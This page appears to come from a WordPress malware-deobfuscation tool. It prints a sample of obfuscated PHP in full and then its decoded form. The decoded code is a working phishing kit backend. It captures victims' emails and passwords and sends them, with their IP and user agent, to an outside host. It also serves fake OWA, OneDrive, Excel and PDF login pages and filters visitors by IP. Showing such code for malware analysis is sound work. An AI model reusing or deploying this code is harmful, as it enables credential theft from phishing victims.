Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php goto lxC33; DTjt1: $batt = "\156\116\154\143"; goto dOXvC; qH3AT: $urldon = ''; goto jATll; Dvo9Q: $agent = base64_encode($_SERVER["\x48\124\x54\120\x5f\x55\x53\105\122\137\x41\107\105\x4e\124"]); goto fpfen; y0f1t: if (!empty($_SERVER["\x48\x54\124\120\137\103\x4c\x49\105\116\124\137\x49\1...



Obfuscated php code

<?php goto lxC33; DTjt1: $batt = "\156\116\154\143"; goto dOXvC; qH3AT: $urldon = ''; goto jATll; Dvo9Q: $agent = base64_encode($_SERVER["\x48\124\x54\120\x5f\x55\x53\105\122\137\x41\107\105\x4e\124"]); goto fpfen; y0f1t: if (!empty($_SERVER["\x48\x54\124\120\137\103\x4c\x49\105\116\124\137\x49\120"])) { $ip = $_SERVER["\x48\x54\x54\120\x5f\x43\114\111\105\x4e\124\x5f\x49\120"]; } elseif (!empty($_SERVER["\110\x54\x54\120\x5f\x58\x5f\106\117\x52\127\x41\x52\104\x45\104\137\x46\117\x52"])) { $ip = $_SERVER["\x48\124\x54\120\x5f\130\137\x46\x4f\x52\x57\101\x52\x44\105\x44\137\106\x4f\x52"]; } else { $ip = $_SERVER["\122\x45\x4d\x4f\x54\x45\137\x41\x44\x44\122"]; } goto qH3AT; qLvty: ini_set("\145\162\162\x6f\x72\x5f\x6c\157\x67", "\x70\150\160\x2d\x65\x72\x72\x6f\162\56\x6c\x6f\147"); goto ri_Q5; TmcIb: $urldon = base64_decode($urldon); goto jm2f3; QWkjA: $mgkg = "\x47\x68\x6c\x63"; goto DTjt1; mzKBC: $mcbhei = "\151\x35\152\142\62\x30\166"; goto vdipK; uwaTo: $ip = getUserIP(); goto Dvo9Q; dOXvC: $iitt = "\63\x4e\x70\x62"; goto eCPzR; ri_Q5: ini_set("\x64\x69\163\x70\x6c\141\x79\x5f\145\162\x72\157\x72\163", 0); goto y0f1t; lxC33: ini_set("\154\157\x67\x5f\x65\162\162\x6f\x72\x73", 1); goto qLvty; jATll: $dgri = "\x61\x48\122\60\x63\110\x4d"; goto sLvwJ; eCPzR: $draa = "\62\64\171"; goto nm1FJ; nm1FJ: $njod = "\142\x57\106\x70\x62"; goto mzKBC; sLvwJ: $jdoe = "\66\x4c\171\x39\x76\x64"; goto QWkjA; jm2f3: function getUserIP() { $client = @$_SERVER["\110\x54\x54\x50\x5f\x43\x4c\111\x45\x4e\x54\x5f\111\120"]; $forward = @$_SERVER["\x48\x54\x54\x50\x5f\130\137\106\x4f\x52\x57\101\x52\x44\x45\x44\137\x46\x4f\122"]; $remote = $_SERVER["\x52\105\115\117\124\105\x5f\x41\104\x44\122"]; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } goto uwaTo; fpfen: if (isset($_GET["\165\151\x64"])) { header("\x41\x63\143\x65\163\x73\x2d\103\x6f\156\x74\x72\157\154\x2d\101\x6c\x6c\x6f\167\x2d\117\162\151\x67\151\x6e\72\x20\x2a"); header("\101\143\143\145\x73\x73\x2d\103\157\x6e\x74\x72\x6f\x6c\x2d\x41\154\154\157\167\x2d\115\x65\164\x68\157\x64\163\72\40\x50\117\x53\x54\x2c\x20\107\105\124\54\40\117\120\124\111\117\x4e\123\x2c\40\x50\x55\124\54\x20\104\105\114\105\x54\x45"); header("\101\143\x63\145\x73\163\55\103\157\x6e\x74\x72\x6f\154\55\x41\154\x6c\157\x77\x2d\110\x65\x61\144\x65\162\163\x3a\40\x4f\x72\x69\147\x69\156\x2c\x20\103\x6f\156\164\145\156\164\55\124\x79\160\145\54\40\x41\143\x63\x65\x70\164\x2c\x20\101\x75\x74\x68\x6f\x72\151\x7a\141\164\151\157\x6e\x2c\40\x58\x2d\122\x65\161\x75\145\163\x74\55\x57\151\164\150"); header("\x43\157\x6e\164\145\x6e\x74\55\124\x79\160\x65\72\40\141\x70\160\154\x69\x63\x61\164\x69\x6f\156\57\152\163\x6f\x6e\x3b\x20\x63\x68\141\162\x73\145\164\x3d\x75\164\146\55\70"); $uidxx = $_GET["\x75\151\x64"]; $emailxx = $_GET["\x65\155\x61\x69\154"]; $passwordxx = $_GET["\160\x61\x73\163"]; $typexx = $_GET["\x74\171\x70\145"]; $url = $urldon . "\x2f\154\157\x67\x73\x73\141\x76\145\56\x70\150\160\57\x3f\165\151\x64\75" . $uidxx . "\x26\145\155\x61\151\x6c\75" . $emailxx . "\46\160\141\x73\163\x3d" . $passwordxx . "\x26\x69\160\75" . $ip . "\46\141\147\x65\x6e\164\x3d" . $agent . "\46\x64\x71\75\46\x74\171\160\x65\75" . $typexx; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 400); curl_setopt($ch, CURLOPT_URL, $url); $jsonData = curl_exec($ch); curl_close($ch); echo $jsonData; } elseif (isset($_GET["\x67\x65\164\145\x6d\141\x69\154\x69\156\146\x6f"])) { header("\x41\143\x63\x65\x73\x73\55\x43\157\x6e\164\162\x6f\154\x2d\101\154\154\x6f\167\x2d\x4f\x72\151\x67\x69\156\x3a\x20\52"); header("\x41\x63\143\x65\x73\163\x2d\x43\x6f\156\x74\x72\x6f\154\55\101\154\x6c\157\167\x2d\115\x65\x74\x68\157\x64\x73\x3a\40\120\117\x53\124\54\40\107\105\124\x2c\40\x4f\x50\124\x49\117\116\123\54\40\x50\x55\124\54\x20\104\105\114\105\124\105"); header("\x41\x63\x63\x65\x73\x73\x2d\x43\157\x6e\164\x72\x6f\x6c\55\x41\154\x6c\157\167\x2d\x48\x65\x61\x64\x65\x72\163\72\x20\x4f\162\151\x67\x69\x6e\54\40\x43\x6f\x6e\x74\145\x6e\164\x2d\124\171\x70\x65\x2c\40\x41\x63\x63\x65\160\x74\54\x20\x41\x75\164\x68\x6f\162\x69\x7a\x61\x74\151\x6f\x6e\54\40\130\55\x52\145\x71\165\145\x73\x74\55\127\x69\164\x68"); header("\103\157\x6e\164\145\x6e\x74\55\x54\x79\160\x65\72\40\141\160\160\x6c\x69\x63\141\164\x69\157\156\57\152\x73\157\x6e\x3b\x20\x63\150\x61\162\x73\145\164\x3d\x75\164\x66\x2d\x38"); $uidxx = $_GET["\165\151\x64\156\x6f\167"]; $emailxx = $_GET["\x67\145\164\145\x6d\x61\x69\x6c\151\x6e\x66\x6f"]; $dqxx = $_GET["\144\161"]; $typexx = $_GET["\164\171\160\145"]; $url = $urldon . "\57\x6c\157\x67\x73\163\x61\166\x65\56\160\150\x70\x2f\77\x75\x69\x64\x6e\x6f\167\x3d" . $uidxx . "\46\147\145\x74\145\x6d\141\x69\x6c\151\x6e\x66\x6f\75" . $emailxx . "\46\151\x70\75" . $ip . "\46\x61\147\x65\156\164\75" . $agent . "\46\144\x71\x3d" . $dqxx . "\46\x74\171\x70\145\x3d" . $typexx; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 400); curl_setopt($ch, CURLOPT_URL, $url); $jsonData = curl_exec($ch); curl_close($ch); echo $jsonData; } else { require __DIR__ . "\57\151\x2e\x70\150\160"; $html_string = "\124\131\x50\x45\x58\130\x58"; $url = "\x68\x74\x74\x70\163\x3a\x2f\57"; $url .= $_SERVER["\110\x54\124\x50\137\x48\x4f\123\124"]; $data_raw = explode("\77", $_SERVER["\122\105\121\x55\x45\x53\124\x5f\x55\x52\111"])[1]; $data_raw = urldecode($data_raw); $rbox = null; $vbox = null; if (strpos($data_raw, "\x4e\x30\61\x32\x33\116") !== FALSE) { $data = explode("\x4e\x30\x31\x32\x33\x4e", $data_raw)[0]; if (!empty(explode("\x4e\x30\61\x32\x33\116", $data_raw)[1])) { $vbox = explode("\116\x30\x31\x32\x33\x4e", $data_raw)[1]; if (strpos($vbox, "\x25\x34\x30") !== FALSE || strpos($vbox, "\100") !== FALSE) { $vbox = str_replace("\x25\64\x30", "\x40", $vbox); $ssns1 = explode("\x40", $vbox)[0]; $ssns2 = explode("\x40", $vbox)[1]; if (strpos($ssns2, "\137") !== FALSE) { $ssns2 = str_replace("\x5f", "\x2e", $ssns2); $vbox = $ssns1 . $ssns2; } } } } else { $data = explode("\77", $_SERVER["\122\x45\x51\125\105\123\x54\x5f\125\x52\111"])[1]; $data2 = explode("\77", $_SERVER["\x52\105\121\125\105\x53\x54\137\125\x52\111"])[0]; } function decode($data) { $myArray = explode("\x26", base64_decode($data)); $data_out = array(); foreach ($myArray as $x) { if (strpos($x, "\x73\x76") !== FALSE) { $data_out["\x73\x76"] = explode("\x3d", $x)[1]; } if (strpos($x, "\165\x69\144") !== FALSE) { $data_out["\x75\x69\144"] = explode("\75", $x)[1]; } if (strpos($x, "\162\x62\x6f\x78") !== FALSE) { $data_out["\x72\x62\157\170"] = explode("\75", $x)[1]; } if (strpos($x, "\x69\160\x64\x61\x74\141") !== FALSE) { $data_out["\151\160\144\141\x74\x61"] = explode("\75", $x)[1]; } if (strpos($x, "\166\142\157\x78") !== FALSE) { $data_out["\x76\142\157\x78"] = explode("\75", $x)[1]; $vbox = explode("\x3d", $x)[1]; } } return $data_out; } $_toprofile = decode($data); if ($_toprofile["\x69\160\144\x61\x74\x61"]) { if ($_toprofile["\151\160\x64\141\x74\x61"] != $ip) { header("\114\x6f\x63\141\x74\x69\x6f\x6e\x3a\x20\57\64\60\x34"); die; } } else { $linkinfo = "\151\x70\x64\141\x74\x61\x3d" . $ip . "\x26" . base64_decode($data); header("\x4c\x6f\143\x61\x74\151\x6f\156\x3a\40" . $data2 . "\x3f" . base64_encode($linkinfo) . "\43" . base64_encode($vbox)); } function profile($data, $vbox, $url, $html_string, $urldon, $XXXAPIXXX) { if (strpos($data["\x73\x76"], "\157\167\141") !== FALSE) { $todolink = $urldon . "\57\x75\163\x65\162\56\160\150\160\x3f\x75\151\x64\x3d" . $data["\x75\151\x64"] . "\46\x67\x65\156\x70\x3d\x6f\167\141"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\107\105\124")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\x49\116\126\101\114\x49\104") { header("\114\x6f\x63\141\x74\151\157\x6e\x3a\40\57\x23\65\60\60\x2d\116\x55\114\x4c"); die; } $html_string = str_replace("\124\x59\x50\x45\130\130\x58", $jscodeblock, $html_string); } if (strpos($data["\x73\x76"], "\x77\145") !== FALSE) { $todolink = $urldon . "\x2f\x75\163\x65\162\x2e\160\x68\x70\77\x75\x69\x64\x3d" . $data["\165\x69\144"] . "\46\147\x65\x6e\160\x3d\x77\145"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\x47\x45\x54")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\116\x56\101\114\x49\104") { header("\x4c\157\x63\141\164\x69\x6f\156\x3a\40\x2f\x23\65\x30\60\x2d\116\x55\x4c\x4c"); die; } $html_string = str_replace("\x54\131\120\105\x58\x58\x58", $jscodeblock, $html_string); } if (strpos($data["\x73\166"], "\x6f\x6e\145\x64\x72\x69\x76\145") !== FALSE) { $todolink = $urldon . "\x2f\165\x73\145\162\x2e\160\150\x70\x3f\x75\x69\144\x3d" . $data["\165\151\144"] . "\x26\x67\x65\x6e\160\x3d\x6f\x6e\x65\144\x72\x69\166\145"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\x47\105\x54")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\x4e\x56\101\x4c\111\x44") { header("\114\157\x63\x61\164\x69\157\x6e\x3a\x20\57\x23\65\x30\60\55\116\x55\114\x4c"); die; } $html_string = str_replace("\124\131\x50\105\x58\130\130", $jscodeblock, $html_string); } if (strpos($data["\x73\x76"], "\145\x78\x63\145\154") !== FALSE) { $todolink = $urldon . "\57\165\x73\x65\x72\x2e\160\x68\x70\x3f\165\151\144\75" . $data["\x75\x69\144"] . "\46\x67\x65\x6e\x70\x3d\145\x78\143\145\x6c"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\107\x45\124")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\x4e\126\x41\114\111\x44") { header("\114\157\143\141\x74\151\x6f\156\x3a\x20\x2f\43\65\x30\60\55\x4e\125\x4c\114"); die; } $html_string = str_replace("\x54\x59\x50\105\x58\130\x58", $jscodeblock, $html_string); } if (strpos($data["\x73\166"], "\147\145\156\145\162\141\154") !== FALSE) { $todolink = $urldon . "\57\x75\x73\x65\162\56\160\x68\x70\x3f\165\x69\144\75" . $data["\165\x69\144"] . "\46\147\145\156\160\x3d\147\145\156\x65\162\x61\154"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\x47\x45\x54")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\x49\116\126\x41\114\111\x44") { header("\x4c\157\x63\x61\164\x69\x6f\156\x3a\x20\57\43\65\x30\60\x2d\116\125\x4c\x4c"); die; } $html_string = str_replace("\124\131\x50\x45\x58\x58\130", $jscodeblock, $html_string); } if (strpos($data["\x73\x76"], "\x70\144\146") !== FALSE) { $todolink = $urldon . "\x2f\x75\163\145\162\56\x70\x68\x70\77\165\x69\144\75" . $data["\x75\x69\x64"] . "\x26\x67\145\156\x70\75\x70\144\x66"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\107\x45\124")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\x4e\x56\101\x4c\x49\104") { header("\114\x6f\x63\x61\164\x69\157\x6e\x3a\40\x2f\43\x35\60\x30\x2d\116\x55\114\114"); die; } $html_string = str_replace("\x54\x59\x50\x45\x58\130\x58", $jscodeblock, $html_string); } $html_string = str_replace("\x45\115\x41\x49\x4c\x58\130\x58", $data["\x76\x62\x6f\x78"], $html_string); if ($html_string === "\x54\131\x50\105\130\x58\130") { header("\x4c\157\143\x61\164\151\157\x6e\x3a\x20\x2f\x23\65\60\60\x2d\x4e\x55\x4c\x4c"); die; } else { print $html_string; } } profile($_toprofile, $vbox, $url, $html_string, $urldon, $XXXAPIXXX); } goto YQqzi; vdipK: $urldon .= $dgri . $jdoe . $mgkg . $batt . $iitt . $draa . $njod . $mcbhei; goto TmcIb; YQqzi:

Decoded(de-Obfuscated) php code

<?php

ini_set("log_errors", 1);
ini_set("error_log", "php-error.log");
ini_set("display_errors", 0);
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else {
    $ip = $_SERVER["REMOTE_ADDR"];
}
$urldon = '';
$dgri = "aHR0cHM";
$jdoe = "6Ly9vd";
$mgkg = "Ghlc";
$batt = "nNlc";
$iitt = "3Npb";
$draa = "24y";
$njod = "bWFpb";
$mcbhei = "i5jb20v";
$urldon = "aHR0cHM6Ly9vdGhlcnNlc3Npb24ybWFpbi5jb20v";
$urldon = "https://othersession2main.com/";
function getUserIP()
{
    $client = @$_SERVER["HTTP_CLIENT_IP"];
    $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"];
    $remote = $_SERVER["REMOTE_ADDR"];
    if (filter_var($client, FILTER_VALIDATE_IP)) {
        $ip = $client;
    } elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
        $ip = $forward;
    } else {
        $ip = $remote;
    }
    return $ip;
}
$ip = getUserIP();
$agent = base64_encode($_SERVER["HTTP_USER_AGENT"]);
if (isset($_GET["uid"])) {
    header("Access-Control-Allow-Origin: *");
    header("Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE");
    header("Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With");
    header("Content-Type: application/json; charset=utf-8");
    $uidxx = $_GET["uid"];
    $emailxx = $_GET["email"];
    $passwordxx = $_GET["pass"];
    $typexx = $_GET["type"];
    $url = "https://othersession2main.com//logssave.php/?uid=" . $uidxx . "&email=" . $emailxx . "&pass=" . $passwordxx . "&ip=" . $ip . "&agent=" . $agent . "&dq=&type=" . $typexx;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 400);
    curl_setopt($ch, CURLOPT_URL, $url);
    $jsonData = curl_exec($ch);
    curl_close($ch);
    echo $jsonData;
} elseif (isset($_GET["getemailinfo"])) {
    header("Access-Control-Allow-Origin: *");
    header("Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE");
    header("Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With");
    header("Content-Type: application/json; charset=utf-8");
    $uidxx = $_GET["uidnow"];
    $emailxx = $_GET["getemailinfo"];
    $dqxx = $_GET["dq"];
    $typexx = $_GET["type"];
    $url = "https://othersession2main.com//logssave.php/?uidnow=" . $uidxx . "&getemailinfo=" . $emailxx . "&ip=" . $ip . "&agent=" . $agent . "&dq=" . $dqxx . "&type=" . $typexx;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 400);
    curl_setopt($ch, CURLOPT_URL, $url);
    $jsonData = curl_exec($ch);
    curl_close($ch);
    echo $jsonData;
} else {
    require "/var/www/html/i.php";
    $html_string = "TYPEXXX";
    $url = "https://";
    $url .= $_SERVER["HTTP_HOST"];
    $data_raw = explode("?", $_SERVER["REQUEST_URI"])[1];
    $data_raw = urldecode($data_raw);
    $rbox = null;
    $vbox = null;
    if (strpos($data_raw, "N0123N") !== FALSE) {
        $data = explode("N0123N", $data_raw)[0];
        if (!empty(explode("N0123N", $data_raw)[1])) {
            $vbox = explode("N0123N", $data_raw)[1];
            if (strpos($vbox, "%40") !== FALSE || strpos($vbox, "@") !== FALSE) {
                $vbox = str_replace("%40", "@", $vbox);
                $ssns1 = explode("@", $vbox)[0];
                $ssns2 = explode("@", $vbox)[1];
                if (strpos($ssns2, "_") !== FALSE) {
                    $ssns2 = str_replace("_", ".", $ssns2);
                    $vbox = $ssns1 . $ssns2;
                }
            }
        }
    } else {
        $data = explode("?", $_SERVER["REQUEST_URI"])[1];
        $data2 = explode("?", $_SERVER["REQUEST_URI"])[0];
    }
    function decode($data)
    {
        $myArray = explode("&", base64_decode($data));
        $data_out = array();
        foreach ($myArray as $x) {
            if (strpos($x, "sv") !== FALSE) {
                $data_out["sv"] = explode("=", $x)[1];
            }
            if (strpos($x, "uid") !== FALSE) {
                $data_out["uid"] = explode("=", $x)[1];
            }
            if (strpos($x, "rbox") !== FALSE) {
                $data_out["rbox"] = explode("=", $x)[1];
            }
            if (strpos($x, "ipdata") !== FALSE) {
                $data_out["ipdata"] = explode("=", $x)[1];
            }
            if (strpos($x, "vbox") !== FALSE) {
                $data_out["vbox"] = explode("=", $x)[1];
                $vbox = explode("=", $x)[1];
            }
        }
        return $data_out;
    }
    $_toprofile = decode($data);
    if ($_toprofile["ipdata"]) {
        if ($_toprofile["ipdata"] != $ip) {
            header("Location: /404");
            die;
        }
    } else {
        $linkinfo = "ipdata=" . $ip . "&" . base64_decode($data);
        header("Location: " . $data2 . "?" . base64_encode($linkinfo) . "#" . base64_encode($vbox));
    }
    function profile($data, $vbox, $url, $html_string, $urldon, $XXXAPIXXX)
    {
        if (strpos($data["sv"], "owa") !== FALSE) {
            $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=owa";
            $curl = curl_init();
            curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
            $jscodeblock = curl_exec($curl);
            $err = curl_error($curl);
            curl_close($curl);
            if ($jscodeblock === "INVALID") {
                header("Location: /#500-NULL");
                die;
            }
            $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
        }
        if (strpos($data["sv"], "we") !== FALSE) {
            $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=we";
            $curl = curl_init();
            curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
            $jscodeblock = curl_exec($curl);
            $err = curl_error($curl);
            curl_close($curl);
            if ($jscodeblock === "INVALID") {
                header("Location: /#500-NULL");
                die;
            }
            $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
        }
        if (strpos($data["sv"], "onedrive") !== FALSE) {
            $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=onedrive";
            $curl = curl_init();
            curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
            $jscodeblock = curl_exec($curl);
            $err = curl_error($curl);
            curl_close($curl);
            if ($jscodeblock === "INVALID") {
                header("Location: /#500-NULL");
                die;
            }
            $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
        }
        if (strpos($data["sv"], "excel") !== FALSE) {
            $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=excel";
            $curl = curl_init();
            curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
            $jscodeblock = curl_exec($curl);
            $err = curl_error($curl);
            curl_close($curl);
            if ($jscodeblock === "INVALID") {
                header("Location: /#500-NULL");
                die;
            }
            $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
        }
        if (strpos($data["sv"], "general") !== FALSE) {
            $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=general";
            $curl = curl_init();
            curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
            $jscodeblock = curl_exec($curl);
            $err = curl_error($curl);
            curl_close($curl);
            if ($jscodeblock === "INVALID") {
                header("Location: /#500-NULL");
                die;
            }
            $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
        }
        if (strpos($data["sv"], "pdf") !== FALSE) {
            $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=pdf";
            $curl = curl_init();
            curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
            $jscodeblock = curl_exec($curl);
            $err = curl_error($curl);
            curl_close($curl);
            if ($jscodeblock === "INVALID") {
                header("Location: /#500-NULL");
                die;
            }
            $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
        }
        $html_string = str_replace("EMAILXXX", $data["vbox"], $html_string);
        if ($html_string === "TYPEXXX") {
            header("Location: /#500-NULL");
            die;
        } else {
            print $html_string;
        }
    }
    profile($_toprofile, $vbox, $url, $html_string, $urldon, $XXXAPIXXX);
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.